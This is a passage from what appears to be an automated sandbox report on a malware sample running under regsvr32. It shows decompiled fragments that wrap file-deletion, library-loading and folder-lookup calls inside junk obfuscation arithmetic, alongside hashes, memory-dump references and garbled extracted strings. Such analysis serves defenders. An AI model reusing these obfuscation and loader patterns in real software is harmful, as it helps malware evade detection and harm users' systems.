				_t46 =  *_t45(0, _a20, 0, _a8, _t51, __ecx, __edx, _a4, _a8, 0, 0, _a20, _a24, _a28, _a32); // executed
				return _t46;
			}

0x003e66cf
0x003e66e4
0x003e66e9
0x003e66f3
0x003e66f7
0x003e66fe
0x003e6705
0x003e670c
0x003e6710
0x003e6717
0x003e671e
0x003e6725
0x003e6729
0x003e672d
0x003e6734
0x003e673b
0x003e6742
0x003e6766
0x003e6777
0x003e677e

APIs

SHGetFolderPathW.SHELL32(00000000,060C7659,00000000,00B459C6,?), ref: 003E6777

Memory Dump Source

Source File: 00000007.00000002.721286442.00000000003D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000007.00000002.721278515.00000000003D0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.721323407.00000000003F4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3d0000_regsvr32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
Instruction ID: 5a33faed1d8284682ae78425484b3c77da93cd44fed864f144a9287ee4f1cf5c
Opcode Fuzzy Hash: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
Instruction Fuzzy Hash: F21144B2800219FBCF15DF95CC0A8DFBFB4EF85304F108198E92966210D3B18A65DB90

Uniqueness

Uniqueness Score: -1.00%

Function 003DFCB5 Relevance: 1.6, APIs: 1, Instructions: 50
libraryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E003DFCB5(void* __ecx, WCHAR* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t36;
				struct HINSTANCE__* _t47;
				signed int _t49;
				signed int _t50;
				WCHAR* _t57;

				_push(_a4);
				_t57 = __edx;
				_push(__edx);
				E003D9E7D(_t36);
				_v20 = 0x4781cd;
				_t49 = 7;
				_v20 = _v20 / _t49;
				_v20 = _v20 ^ 0x0004a997;
				_v8 = 0x9f6121;
				_v8 = _v8 | 0x04abbfea;
				_v8 = _v8 ^ 0x44133d53;
				_v8 = _v8 ^ 0x40a32c45;
				_v16 = 0x791f5b;
				_t50 = 0x6e;
				_v16 = _v16 / _t50;
				_v16 = _v16 ^ 0x000d135a;
				_v12 = 0x90c5d0;
				_v12 = _v12 ^ 0x2cafc93f;
				_v12 = _v12 ^ 0x2c381e09;
				E003EBFF0(0xac802c42, 0x347, _t50, _t50, 0xede26741);
				_t47 = LoadLibraryW(_t57); // executed
				return _t47;
			}

0x003dfcbc
0x003dfcbf
0x003dfcc1
0x003dfcc3
0x003dfcc8
0x003dfcd6
0x003dfcdb
0x003dfce0
0x003dfce7
0x003dfcee
0x003dfcf5
0x003dfcfc
0x003dfd03
0x003dfd0d
0x003dfd13
0x003dfd16
0x003dfd1d
0x003dfd24
0x003dfd2b
0x003dfd4f
0x003dfd58
0x003dfd5e

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 003DFD58

Memory Dump Source

Source File: 00000007.00000002.721286442.00000000003D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000007.00000002.721278515.00000000003D0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.721323407.00000000003F4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3d0000_regsvr32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8bacd117322b64fd42504966482242d0bc11aa74408019ed1aecf2da1c0dea5e
Instruction ID: 6579aa95e53cc30330ceadac833543e84289dbcaeeee6ce2b5dfbb33e56a4003
Opcode Fuzzy Hash: 8bacd117322b64fd42504966482242d0bc11aa74408019ed1aecf2da1c0dea5e
Instruction Fuzzy Hash: 7C112E71D00218EBDB18DFA5DC4A9EFBBB5EB44304F108289E429A6251DBB56B148B91

Uniqueness

Uniqueness Score: -1.00%

Function 003D9EA8 Relevance: 1.5, APIs: 1, Instructions: 44
fileCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E003D9EA8(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t35;
				int _t42;
				WCHAR* _t46;

				_push(_a8);
				_t46 = __ecx;
				_push(_a4);
				_push(__ecx);
				E003D9E7D(_t35);
				_v20 = 0xb0cce;
				_v20 = _v20 + 0xffff00ee;
				_v20 = _v20 ^ 0x0007bd05;
				_v12 = 0x1e8fca;
				_v12 = _v12 >> 6;
				_v12 = _v12 << 8;
				_v12 = _v12 + 0xffff1da9;
				_v12 = _v12 ^ 0x0077171f;
				_v16 = 0xc679b7;
				_v16 = _v16 + 0x38bf;
				_v16 = _v16 ^ 0x00cf762a;
				_v8 = 0xa3ba51;
				_v8 = _v8 ^ 0xa0d3ead1;
				_v8 = _v8 + 0xe688;
				_v8 = _v8 + 0xffff6d73;
				_v8 = _v8 ^ 0xa079263d;
				E003EBFF0(0xac802c42, 0x385, __ecx, __ecx, 0x77e9f533);
				_t42 = DeleteFileW(_t46); // executed
				return _t42;
			}

0x003d9eaf
0x003d9eb2
0x003d9eb4
0x003d9eb8
0x003d9eb9
0x003d9ebe
0x003d9ec8
0x003d9ecf
0x003d9ed6
0x003d9edd
0x003d9ee1
0x003d9ee5
0x003d9eec
0x003d9ef3
0x003d9efa
0x003d9f01
0x003d9f08
0x003d9f0f
0x003d9f16
0x003d9f1d
0x003d9f24
0x003d9f48
0x003d9f51
0x003d9f57

APIs

DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00E39F9E,00000000), ref: 003D9F51

Memory Dump Source

Source File: 00000007.00000002.721286442.00000000003D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000007.00000002.721278515.00000000003D0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.721323407.00000000003F4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3d0000_regsvr32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 05b63ea037540c08496bef69ee0cecfed80cfa419fc6bd7bfec422803f2d9975
Instruction ID: f218faaa2eae138eb4825c59dd1c4a74ba8050d04487499b3a7ca727d0d70b93
Opcode Fuzzy Hash: 05b63ea037540c08496bef69ee0cecfed80cfa419fc6bd7bfec422803f2d9975
Instruction Fuzzy Hash: 24114CB1C01219EBDF45DFA4D80A4DEBBB4EF10318F108288E81566250E7B01B148F91

Uniqueness

Uniqueness Score: -1.00%

Function 003DBA9C Relevance: 1.5, APIs: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E003DBA9C(int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t34;

				_v20 = 0x6b4597;
				_v20 = _v20 >> 2;
				_v20 = _v20 ^ 0x00116e69;
				_v16 = 0x7d3df7;
				_v16 = _v16 << 3;
				_v16 = _v16 ^ 0x03ee9fa4;
				_v12 = 0x7e0c35;
				_v12 = _v12 ^ 0xa2581e84;
				_v12 = _v12 ^ 0xa22bc007;
				_v8 = 0xada9ee;
				_push(_t34);
				_v8 = _v8 * 0x61;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x6b103fde;
				E003EBFF0(0xac802c42, 0x166, _t34, _t34, 0x80a33dd2);
				ExitProcess(_a12);
			}

0x003dbaa2
0x003dbaa9
0x003dbaad
0x003dbab4
0x003dbabb
0x003dbabf
0x003dbac6
0x003dbacd
0x003dbad4
0x003dbadb
0x003dbae6
0x003dbaee
0x003dbaf6
0x003dbafa
0x003dbb12
0x003dbb1d

APIs

ExitProcess.KERNEL32(00116E69), ref: 003DBB1D

Memory Dump Source

Source File: 00000007.00000002.721286442.00000000003D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000007.00000002.721278515.00000000003D0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.721323407.00000000003F4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3d0000_regsvr32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 5a29f8c2dfa274dc4c38ec6c4fc52361ad96745e54715afb883c837706f91096
Instruction ID: 0bc9ee3cbbb9fa8b553323472e0576518a2dc447308cf180fdedea30781fa019
Opcode Fuzzy Hash: 5a29f8c2dfa274dc4c38ec6c4fc52361ad96745e54715afb883c837706f91096
Instruction Fuzzy Hash: 9B0100B5D1120CEBCB08DFA9CA4A9DEBBB4FB04348F108699E821B7211D7B55B04CF81

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exePID: 2924, Parent PID: 1240COMMON

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0.4%
Total number of Nodes:	922
Total number of Limit Nodes:	3

Executed Functions

Function 0029110E Relevance: 5.2, Strings: 4, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

n'r, xrefs: 00291231
*G/, xrefs: 00291161
jnr, xrefs: 0029130A
vJ, xrefs: 002911E5

Memory Dump Source

Source File: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00271000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_271000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: *G/$jnr$n'r$vJ
API String ID: 0-1837474577
Opcode ID: 8394bdcfe05464de37ef81cf5fc6a51d4b7212829df7ae24e33a0b89c761c6e8
Instruction ID: d40b3795edbfc983a3be77a464b6e87605c88ca74be22b314b2a10b4535952b3
Opcode Fuzzy Hash: 8394bdcfe05464de37ef81cf5fc6a51d4b7212829df7ae24e33a0b89c761c6e8
Instruction Fuzzy Hash: 8D9110B1D0020DEBDF18CFA4D98A9DEBBB2FF04314F20815AE515B6250DBB55A4ACF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00271B09 Relevance: 15.4, Strings: 12, Instructions: 384
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

6O", xrefs: 002721FE
0'H, xrefs: 00271CA9
3C, xrefs: 00271FA5
5, xrefs: 00271F57
m+h6c, xrefs: 002721B3
i , xrefs: 00271F86
3Oj, xrefs: 00271CEC
6O", xrefs: 00272142
!, xrefs: 00271D89
6c, xrefs: 00271DDD
3C, xrefs: 002721C7
k%, xrefs: 00271C63

Memory Dump Source

Source File: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00271000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_271000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: !$0'H$3C$3C$3Oj$5$6O"$6O"$6c$k%$m+h6c$i
API String ID: 0-2181255642
Opcode ID: 7122a2a36a987e276dccab5df878f606cc7511b9c40743667ef88ef32be56bf0
Instruction ID: 596a14231a07c125ea1dad8ea43b9f8229524b709df2df58bb710262d6565a99
Opcode Fuzzy Hash: 7122a2a36a987e276dccab5df878f606cc7511b9c40743667ef88ef32be56bf0
Instruction Fuzzy Hash: 37024171118381DFD368DF65C489A5BBBE1FBC4358F60891DF68A86260D7B1C899CF82

Uniqueness

Uniqueness Score: -1.00%

Function 0028C535 Relevance: 12.9, Strings: 10, Instructions: 446
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

VV, xrefs: 0028C82C
7rI, xrefs: 0028C585
>&v_, xrefs: 0028CC6E
v_, xrefs: 0028C57D
5W^, xrefs: 0028C685
{r, xrefs: 0028C8B3
S^C, xrefs: 0028C9AD
}D>, xrefs: 0028CC0D
U, xrefs: 0028C783
ZIB, xrefs: 0028CBA8

Memory Dump Source

Source File: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00271000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_271000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 5W^$7rI$>&v_$S^C$VV$ZIB$v_${r$}D>$U
API String ID: 0-3159306018
Opcode ID: 3fbe10612171f2b2b5878efb14c9477fcb37e7793d064e650ef52f2c1a8fcc3a
Instruction ID: de646f9ebcd82a634725447ea5063889aec1c1679fd76b2190467aea012eed83
Opcode Fuzzy Hash: 3fbe10612171f2b2b5878efb14c9477fcb37e7793d064e650ef52f2c1a8fcc3a
Instruction Fuzzy Hash: 5F3200725093819FD3B8CF25C94AB9BBBE1BBC4708F10891DE2D986260D7B58919CF17

Uniqueness

Uniqueness Score: -1.00%

Function 0028882F Relevance: 12.9, Strings: 10, Instructions: 423
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(*, xrefs: 00288D95
+t, xrefs: 00288D33
DJP, xrefs: 00288B1A
Mv4, xrefs: 00288CE1
=X, xrefs: 00288DBC
i, xrefs: 00288E4F
[Y-:, xrefs: 00288D23
.3, xrefs: 00288BA3
qjZ, xrefs: 00288DE6
E, xrefs: 00288987

Memory Dump Source

Source File: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00271000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_271000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: (*$+t$.3$=X$DJP$Mv4$[Y-:$qjZ$E$i
API String ID: 0-269569919
Opcode ID: 56ea4f13e4109ca0cb1007420bd28436dde69d78574a903012ea61824cb6274e
Instruction ID: 565c452b7555ad6fb5e339a74f1a7f2be92e5f58eb327116fb7c63bdf0e1466e
Opcode Fuzzy Hash: 56ea4f13e4109ca0cb1007420bd28436dde69d78574a903012ea61824cb6274e
Instruction Fuzzy Hash: E822127151D380DFE3A8DF25C889A9BBBE1BBC4358F54890DE29986260D7B58858CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00275C9A Relevance: 11.6, Strings: 9, Instructions: 364
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

DJ", xrefs: 00275E80
1, xrefs: 00275D91
;x, xrefs: 00275F78
d'gX, xrefs: 002760B6
SY., xrefs: 00275FAA
T, xrefs: 00276078
K?KL, xrefs: 00276070
rY;, xrefs: 00275E31
OH, xrefs: 00275E14

Memory Dump Source

Source File: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00271000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_271000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 1$;x$DJ"$K?KL$OH$SY.$T$d'gX$rY;
API String ID: 0-1719757854
Opcode ID: 2358b8d145034f95546064355c4c6ad73de5fe094fe89bef5b6175931702015a
Instruction ID: 84ec6677ddbda1a5002e09e9650909837e0d65b70617a7f50c8d65a832d3adf3
Opcode Fuzzy Hash: 2358b8d145034f95546064355c4c6ad73de5fe094fe89bef5b6175931702015a
Instruction Fuzzy Hash: 11023071519782DFD368DF26C54AA5BBBE1FBC4B14F10891DF6AA86260C7B18809CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0027508B Relevance: 11.6, Strings: 9, Instructions: 325
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

89, xrefs: 002755B3
?, xrefs: 002751BA
KVq(, xrefs: 00275267
C$L, xrefs: 002751F3
5y,, xrefs: 00275171
<, xrefs: 002750DC
@h, xrefs: 00275534
8R, xrefs: 00275130
Ey<, xrefs: 0027555D

Memory Dump Source

Source File: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00271000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_271000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: <$89$8R$@h$C$L$Ey<$KVq($5y,$?
API String ID: 0-1528000342
Opcode ID: e5a2faf06073fe112fb6392cafdbd795507df3739cd8689055a3e6e8ff029dd1
Instruction ID: 4680ba8cdb28393ff39f08e3cdb00b3b57e267770054d8ecea99b32356529772
Opcode Fuzzy Hash: e5a2faf06073fe112fb6392cafdbd795507df3739cd8689055a3e6e8ff029dd1
Instruction Fuzzy Hash: 3EF10F715097809FD3A8CF25C58AA4BFBF2FBC5748F108A1DF29986260D7B18959CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00274E77 Relevance: 11.4, Strings: 9, Instructions: 125
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

O, xrefs: 00274E91
$ :sE&, xrefs: 00274F92
sE&, xrefs: 00274ED6
'q, xrefs: 00274F13
i)[, xrefs: 00274F68
[~>, xrefs: 00275074
[~>, xrefs: 0027506F
;1, xrefs: 00274F75
{3QT, xrefs: 00274EC6

Memory Dump Source

Source File: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00271000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_271000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $ :sE&$'q$;1$[~>$[~>$i)[$sE&${3QT$O
API String ID: 0-2484267659
Opcode ID: 3873e2d1e01c4574780439795652f8be94a5f15bf2dc9ae114025e85cb5ecfba
Instruction ID: 4fa8c06ce5e3eb4b5bc873d78edb450d127a25b62b671366638637bac50e07e1
Opcode Fuzzy Hash: 3873e2d1e01c4574780439795652f8be94a5f15bf2dc9ae114025e85cb5ecfba
Instruction Fuzzy Hash: 5E5177715183129FC714DF20D58991FFBE1FBC8758F108A2EF589A6260D3B49A198F87

Uniqueness

Uniqueness Score: -1.00%

Function 002847D2 Relevance: 10.4, Strings: 8, Instructions: 403
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0u4, xrefs: 002848F7
S=!, xrefs: 00284BB0
Y@, xrefs: 00284944
7, xrefs: 002848B4
l<, xrefs: 00284883
Nj!{, xrefs: 002849CA
FI], xrefs: 00284D15
, xrefs: 00284E1A

Memory Dump Source

Source File: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00271000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_271000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Y@$ $0u4$7$FI]$Nj!{$S=!$l<
API String ID: 0-2878404270
Opcode ID: 376c8d5f3fcfcbe99d6bfa580becda7a21f76111fd8e3b0334e1b7d00566f8ca
Instruction ID: f975bb6e7539ea99b469d82803adb815619c730699520a1d8cfad343786634e4
Opcode Fuzzy Hash: 376c8d5f3fcfcbe99d6bfa580becda7a21f76111fd8e3b0334e1b7d00566f8ca
Instruction Fuzzy Hash: 181243755093818FD368DF25C58AA9BBBE1FBC4718F10891DE2DA862A0D7B08959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0028D14C Relevance: 10.3, Strings: 8, Instructions: 259
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$E}, xrefs: 0028D448
McA, xrefs: 0028D218
6y, xrefs: 0028D4BC
zBP, xrefs: 0028D349
O?0x, xrefs: 0028D3EF
1F, xrefs: 0028D2C3
E&c, xrefs: 0028D257
^, xrefs: 0028D4E7

Memory Dump Source

Source File: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00271000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_271000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $E}$1F$6y$E&c$McA$O?0x$zBP$^
API String ID: 0-1306660940
Opcode ID: f731ffe98f1e643370a1805210b3bac7130deadb088136a6b74435647f753daa
Instruction ID: 818ef1f328fee3c261b96a97800a82e75bdcf3bb37ae511e34cf97c04470105d
Opcode Fuzzy Hash: f731ffe98f1e643370a1805210b3bac7130deadb088136a6b74435647f753daa
Instruction Fuzzy Hash: F6D132751093819FC368DF24D58990BFBF1BBC8758F10891DF29A86260D7B18959CF46

Uniqueness

Uniqueness Score: -1.00%

Function 0027B4FC Relevance: 10.2, Strings: 8, Instructions: 222
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

W|\, xrefs: 0027B530
s5x, xrefs: 0027B5AB
meZ, xrefs: 0027B7D7
te, xrefs: 0027B5A3
Q, xrefs: 0027B5B3
meZ, xrefs: 0027B811
), xrefs: 0027B623
C&, xrefs: 0027B5E7

Memory Dump Source

Source File: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00271000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_271000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: )$C&$Q$W|\$meZ$meZ$s5x$te
API String ID: 0-1857877517
Opcode ID: 09766ced4583f28540613b6c0b98429ee5ef52b22ab5771e1a6d193f642fa471
Instruction ID: 5b3ef33f89ed79609bbaa3d30fa74207abc90d5fbcb5b95c7bc8b69b06682a5c
Opcode Fuzzy Hash: 09766ced4583f28540613b6c0b98429ee5ef52b22ab5771e1a6d193f642fa471
Instruction Fuzzy Hash: 9AA174711183418BD358CF25C88991FFBE1FBC4758F108A1DF68A9A2A0D7B5C9498F83

Uniqueness

Uniqueness Score: -1.00%

Function 00274700 Relevance: 10.2, Strings: 8, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8, xrefs: 002749D7
'V, xrefs: 00274917
"@l, xrefs: 002749F7
"@l, xrefs: 00274AC9
+E, xrefs: 002747E8
., xrefs: 00274933
Z/, xrefs: 0027499F
X@, xrefs: 00274732

Memory Dump Source

Source File: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00271000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_271000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Z/$"@l$"@l$'V$X@$+E$.$8
API String ID: 0-1688458359
Opcode ID: 16f0ddbf82fa5f98dcfe91b8455ba56b9cf29f00d9cd21df330ac4e379ee4095
Instruction ID: 587349794cbfba51a24cfd8e3b8757b12ed3b5f23bec68fee748ddbb8cbadd4c
Opcode Fuzzy Hash: 16f0ddbf82fa5f98dcfe91b8455ba56b9cf29f00d9cd21df330ac4e379ee4095
Instruction Fuzzy Hash: 99A111715183819FC754DF25C48980BFBE1BBC8358F008A1EF2AA96260D7B5DA198F47

Uniqueness

Uniqueness Score: -1.00%

Function 00273511 Relevance: 9.1, Strings: 7, Instructions: 371COMMON

Download Yara Rule

Strings

z7, xrefs: 002737C9
io;>, xrefs: 0027389B
j<3, xrefs: 002735FE
rP, xrefs: 00273715
U$, xrefs: 00273677
x#m, xrefs: 0027395D
!G, xrefs: 002737A3

Memory Dump Source

Source File: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00271000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_271000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: !G$U$$io;>$j<3$rP$x#m$z7
API String ID: 0-2417781837
Opcode ID: c1e2aea07ac14be0305306f45313272ebd5a91928d521f482ae0243af3ed584b
Instruction ID: a4561c82c4fef7fd8f00d5bde3dea46f1278c8154a99529edf2ea464422b031c
Opcode Fuzzy Hash: c1e2aea07ac14be0305306f45313272ebd5a91928d521f482ae0243af3ed584b
Instruction Fuzzy Hash: 860251729183819FD368CF25C48AA4BFBE2BBC4308F10891DF9D996260D7B59919CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00279133 Relevance: 9.0, Strings: 7, Instructions: 221COMMON

Download Yara Rule

Strings

,, xrefs: 002791F7
nQ;, xrefs: 00279302
GR, xrefs: 00279183
10, xrefs: 0027928A
*9O, xrefs: 002792EF
d, xrefs: 00279387
y!w, xrefs: 002793FC

Memory Dump Source

Source File: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00271000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_271000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: *9O$10$d$nQ;$y!w$GR$,
API String ID: 0-952755987
Opcode ID: ae90a7ae5b35464e306f33ae97c3b2b50ff85e0a647cd3a0a18bcf15217f3162
Instruction ID: 13bc353fb1a393b7aa846e35ef02c0dd50e4b23a843bb09bce505ceaec9145ba
Opcode Fuzzy Hash: ae90a7ae5b35464e306f33ae97c3b2b50ff85e0a647cd3a0a18bcf15217f3162
Instruction Fuzzy Hash: F8B111725083809FD758CF65D88A51BFBE1FBC4788F10891DF2A986260D3B1CA59CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00291E19 Relevance: 9.0, Strings: 7, Instructions: 217COMMON

Download Yara Rule

Strings

ZPs, xrefs: 00291E75
h<, xrefs: 00291E4D
"G, xrefs: 00292065
^M, xrefs: 002920D2
, xrefs: 00291F0B
sQ%, xrefs: 00291EA5
aG, xrefs: 002920BE

Memory Dump Source

Source File: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00271000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_271000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ZPs$aG$h<$sQ%$"G$^M$
API String ID: 0-965419043
Opcode ID: 712781e0f647ad3be223441e6d66dc7755b616d9c435e3b0bf9cc5a7205c25ca
Instruction ID: a31645c088e10a479ae5694a4e94d93bb24c028e2c4fbdfb5adb5f325cce2357
Opcode Fuzzy Hash: 712781e0f647ad3be223441e6d66dc7755b616d9c435e3b0bf9cc5a7205c25ca
Instruction Fuzzy Hash: 61B143B28193419FC398CF25C58A40BFBE0BB94358F144A1DF59AA6261D3B5DA188F83

Uniqueness

Uniqueness Score: -1.00%

Function 0028A4B5 Relevance: 7.8, Strings: 6, Instructions: 257COMMON

Download Yara Rule

Strings

hk~, xrefs: 0028A7C0
Z<T,, xrefs: 0028A5A3
nTZ, xrefs: 0028A5D7
Do, xrefs: 0028A61E
0e2, xrefs: 0028A736
C, xrefs: 0028A800

Memory Dump Source

Source File: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00271000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_271000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 0e2$C$Do$Z<T,$hk~$nTZ
API String ID: 0-699481322
Opcode ID: 22ee72e5dea2461b50081c1c705ddb1ce971503378c5191625b98e01bee9e6eb
Instruction ID: 0a5c4d3fecee28fdda05c61f85f5d6287d2ae28a0bc2fb06d475b16ea2b616d8
Opcode Fuzzy Hash: 22ee72e5dea2461b50081c1c705ddb1ce971503378c5191625b98e01bee9e6eb
Instruction Fuzzy Hash: FBC11E721193819FD768DF62C88991BBBF1FBC4748F108A1EF69596260C7B68918CF13

Uniqueness

Uniqueness Score: -1.00%

Function 00280418 Relevance: 7.7, Strings: 6, Instructions: 236COMMON

Download Yara Rule

Strings

!M, xrefs: 0028047B
Jc%V, xrefs: 002806B3
W<, xrefs: 00280587
r, xrefs: 00280626
0@G, xrefs: 00280473
"/, xrefs: 002806CB

Memory Dump Source

Source File: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00271000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_271000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: !M$"/$0@G$Jc%V$W<$r
API String ID: 0-2250489904
Opcode ID: 11c24e44acbed8bd94b8c572d387c416f56f515897fbe983a3e28d427fcf470e
Instruction ID: 63731fe611934f5134070c3b056a809c246a2e546a7dd8f26c02e4941d52202c
Opcode Fuzzy Hash: 11c24e44acbed8bd94b8c572d387c416f56f515897fbe983a3e28d427fcf470e
Instruction Fuzzy Hash: 6CB14DB25193419FD3A8CF60D58941BFBE1FBC4758F508A1DF296862A0C3B58959CF83

Uniqueness

Uniqueness Score: -1.00%

Function 0027CED8 Relevance: 7.7, Strings: 6, Instructions: 213COMMON

Download Yara Rule

Strings

Xn, xrefs: 0027D183
7)D, xrefs: 0027D18B
cFj, xrefs: 0027D119
47?v, xrefs: 0027CF57
#8, xrefs: 0027CF13
XdT, xrefs: 0027CF67

Memory Dump Source

Source File: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00271000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_271000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #8$47?v$7)D$XdT$cFj$Xn
API String ID: 0-3696559055
Opcode ID: 4d59f14216db5c877c92a8f315ca80080584a705d643e4074ce93a144a35a28b
Instruction ID: d759ff05ecc0932d80250cd8918e7aa7089a4ecd509651b5ae9f4136299832e9
Opcode Fuzzy Hash: 4d59f14216db5c877c92a8f315ca80080584a705d643e4074ce93a144a35a28b
Instruction Fuzzy Hash: 44B12E724183819FD769CF21C58A40BFBF1BB84788F508A1DF59A92260D7B1DA59CF83

Uniqueness

Uniqueness Score: -1.00%

Function 00289184 Relevance: 7.7, Strings: 6, Instructions: 213COMMON

Download Yara Rule

Strings

rer$, xrefs: 002894C1
~1}, xrefs: 0028927E
K, xrefs: 002892FA
[<, xrefs: 0028926E
